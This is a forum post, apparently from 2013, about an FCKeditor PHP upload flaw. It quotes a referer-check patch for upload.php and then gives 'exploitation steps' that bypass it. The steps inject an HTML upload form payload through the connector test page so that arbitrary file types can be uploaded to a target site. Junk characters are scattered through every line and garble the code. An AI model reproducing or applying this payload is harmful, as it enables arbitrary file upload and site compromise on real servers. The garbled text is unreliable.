漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php, ~- E, h9 k( p
网上给出的修复方案是
) q# n; R! N3 _2 h7 M3 R修复方法,删除FCK编辑器用其他的编辑器
2 h' {" p! ]- i$ f; T或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件3 q; X- s7 k$ ^- G& r [* j
在
3 T. w5 ~2 W# M, {' t( j* {require(‘config.php’);( [$ m# R+ Z. B5 H1 A. l- ?
require(‘util.php’);
! q9 b6 M4 \6 l% v5 i& A7 ^. a* G的下面添加以下代码—————————–7 @4 M; `2 w5 v9 g3 l- T$ K1 x2 n; k
//防止外部提交8 {1 I+ A) e- r& h9 g/ N0 G
function outsidepost()
4 u! P: @: g! F" a! n4 S: N* r{
( ]7 E& ?, @; S3 l5 `4 e$ g$servername=$_SERVER['SERVER_NAME'];
9 _# z3 z1 i- u6 i$sub_from=@$_SERVER['HTTP_REFERER'];/ j3 L+ X6 |3 E! E
$sub_len=strlen($servername);, P/ R4 H% e0 _4 r; B
$checkfrom=substr($sub_from,7,$sub_len);
- i- H2 Y- Z4 Z2 p- [if($checkfrom!=$servername){; k2 N. n# L0 k) W
echo(“you don’t outsidepost!”);* z7 Z0 W* \3 I4 U2 U' ]3 n
exit;
! `! S$ Q0 u' A! Z0 G+ u}
9 w, O/ C4 ?8 M/ K7 i}6 J5 ?7 J* t' }9 W4 Y
outsidepost();$ e+ m$ _) M0 W7 }2 v' i& p3 Y; y+ h
防止外部提交,但是没有防止内部提交,
- L; D, O( v( a8 Z b利用方法:+ q! Z; H2 M q7 o' k
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
) y5 }! h2 G, t. ~0 X* E' P2,在Current Folder 框输入
; q/ V% @) X4 `<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
' Z4 U* X" \5 v" o3 R, U然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
7 S8 A) v& ]) j6 U; ~PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对